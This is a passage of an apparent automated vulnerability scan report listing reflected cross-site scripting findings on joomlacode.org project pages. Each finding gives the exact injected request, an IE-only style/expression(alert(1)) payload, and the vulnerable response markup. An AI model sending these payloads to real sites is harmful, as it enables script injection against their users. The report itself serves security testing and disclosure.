4.126. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5d43d'style%3d'x%3aexpression(alert(1))'7e573a5d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d43d'style='x:expression(alert(1))'7e573a5d85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/frs/?5d43d'style%3d'x%3aexpression(alert(1))'7e573a5d85=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
lspackage_name_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_pkgrlspackage_name_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/frs/?action=&amp;5d43d'style='x:expression(alert(1))'7e573a5d85=1&amp;br_pkgrlssort_by=package_name&amp;br_pkgrlssort_order=asc' />
...[SNIP]...

4.127. http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/frs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e96"style%3d"x%3aexpression(alert(1))"652b2f9725e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93e96"style="x:expression(alert(1))"652b2f9725e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/frs/?93e96"style%3d"x%3aexpression(alert(1))"652b2f9725e=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35802


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/frs/?action=&amp;93e96"style="x:expression(alert(1))"652b2f9725e=1&amp;br_pkgrls_limit=5">
...[SNIP]...

4.128. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/mailman/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3169"style%3d"x%3aexpression(alert(1))"fe217adffb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3169"style="x:expression(alert(1))"fe217adffb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/mailman/?c3169"style%3d"x%3aexpression(alert(1))"fe217adffb1=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19043


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/mailman/?action=&amp;c3169"style="x:expression(alert(1))"fe217adffb1=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.129. http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/mailman/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfcbc'style%3d'x%3aexpression(alert(1))'1670775646d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cfcbc'style='x:expression(alert(1))'1670775646d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/mailman/?cfcbc'style%3d'x%3aexpression(alert(1))'1670775646d=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19043


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
AME_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_mailmansmailman_LIST_NAME_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/mailman/?action=&amp;cfcbc'style='x:expression(alert(1))'1670775646d=1&amp;br_mailmanssort_by=mailman.LIST_NAME&amp;br_mailmanssort_order=asc' />
...[SNIP]...

4.130. http://joomlacode.org/gf/project/joomla/reporting/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/reporting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9725d"style%3d"x%3aexpression(alert(1))"ce70f89e3c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9725d"style="x:expression(alert(1))"ce70f89e3c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/reporting/?9725d"style%3d"x%3aexpression(alert(1))"ce70f89e3c3=1 HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Referer: http://joomlacode.org/gf/project/joomla/tracker/?3ee00%22style%3d%22x%3aexpression(alert(1))%22744e3c5545f=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:02:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<form action="/gf/project/joomla/reporting/?action=&amp;9725d"style="x:expression(alert(1))"ce70f89e3c3=1" method="post">
...[SNIP]...

4.131. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee00"style%3d"x%3aexpression(alert(1))"744e3c5545f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ee00"style="x:expression(alert(1))"744e3c5545f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/?3ee00"style%3d"x%3aexpression(alert(1))"744e3c5545f=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/tracker/?action=&amp;3ee00"style="x:expression(alert(1))"744e3c5545f=1&amp;br_trackers_limit=5">
...[SNIP]...

4.132. http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7a03'style%3d'x%3aexpression(alert(1))'9f2195e1359 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f7a03'style='x:expression(alert(1))'9f2195e1359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/?f7a03'style%3d'x%3aexpression(alert(1))'9f2195e1359=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
TYPE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_trackerstracker_DATATYPE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/tracker/?action=&amp;f7a03'style='x:expression(alert(1))'9f2195e1359=1&amp;br_trackerssort_by=tracker.DATATYPE&amp;br_trackerssort_order=asc' />
...[SNIP]...

4.133. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7669b'style%3d'x%3aexpression(alert(1))'46fd3415584 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7669b'style='x:expression(alert(1))'46fd3415584 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1?7669b'style%3d'x%3aexpression(alert(1))'46fd3415584=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:20:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
TYPE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["br_trackerstracker_DATATYPE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/joomla/tracker/?action=&amp;7669b'style='x:expression(alert(1))'46fd3415584=1&amp;br_trackerssort_by=tracker.DATATYPE&amp;br_trackerssort_order=asc' />
...[SNIP]...

4.134. http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5763"style%3d"x%3aexpression(alert(1))"34a90f5b234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5763"style="x:expression(alert(1))"34a90f5b234 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1?b5763"style%3d"x%3aexpression(alert(1))"34a90f5b234=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:20:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/joomla/tracker/?action=&amp;b5763"style="x:expression(alert(1))"34a90f5b234=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.135. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/mambot_google1/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf24d"style%3d"x%3aexpression(alert(1))"65979b9fed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf24d"style="x:expression(alert(1))"65979b9fed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/mambot_google1/news/?cf24d"style%3d"x%3aexpression(alert(1))"65979b9fed4=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/mambot_google1/news/?action=&amp;cf24d"style="x:expression(alert(1))"65979b9fed4=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.136. http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/mambot_google1/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dd0d2'style%3d'x%3aexpression(alert(1))'c75ef3eb876 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd0d2'style='x:expression(alert(1))'c75ef3eb876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/mambot_google1/news/?dd0d2'style%3d'x%3aexpression(alert(1))'c75ef3eb876=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:47:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
OST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/mambot_google1/news/?action=&amp;dd0d2'style='x:expression(alert(1))'c75ef3eb876=1&amp;newssort_by=news.POST_DATE&amp;newssort_order=asc' />
...[SNIP]...

4.137. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/opengallery/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40eae'style%3d'x%3aexpression(alert(1))'0f0be08920d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40eae'style='x:expression(alert(1))'0f0be08920d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/opengallery/news/?40eae'style%3d'x%3aexpression(alert(1))'0f0be08920d=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
s_POST_DATE_img"].src="/themes/gforge5/images/arrow_up.gif"' onMouseOut='document["newsnews_POST_DATE_img"].src="/themes/gforge5/images/arrow_down.gif"' href='/gf/project/opengallery/news/?action=&amp;40eae'style='x:expression(alert(1))'0f0be08920d=1&amp;newssort_by=news.POST_DATE&amp;newssort_order=asc' />
...[SNIP]...

4.138. http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/project/opengallery/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41731"style%3d"x%3aexpression(alert(1))"7f37426bd6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41731"style="x:expression(alert(1))"7f37426bd6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/project/opengallery/news/?41731"style%3d"x%3aexpression(alert(1))"7f37426bd6a=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:42:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15926


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
   <meta
...[SNIP]...
<a class="quickJumpMenu" href="/gf/project/opengallery/news/?action=&amp;41731"style="x:expression(alert(1))"7f37426bd6a=1&amp;__gads=ID%3D9359d8f79e15ae5a%3AT%3D1295919318%3AS%3DALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg&amp;__utmz=13354156.1295919321.1.1.utmcsr%3Dburp%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%
...[SNIP]...

4.139. http://joomlacode.org/gf/snippet/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://joomlacode.org
Path:   /gf/snippet/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ed9f"style%3d"x%3aexpression(alert(1))"8d782a550bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ed9f"style="x:expression(alert(1))"8d782a550bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /gf/snippet/?2ed9f"style%3d"x%3aexpression(alert(1))"8d782a550bf=1 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17883


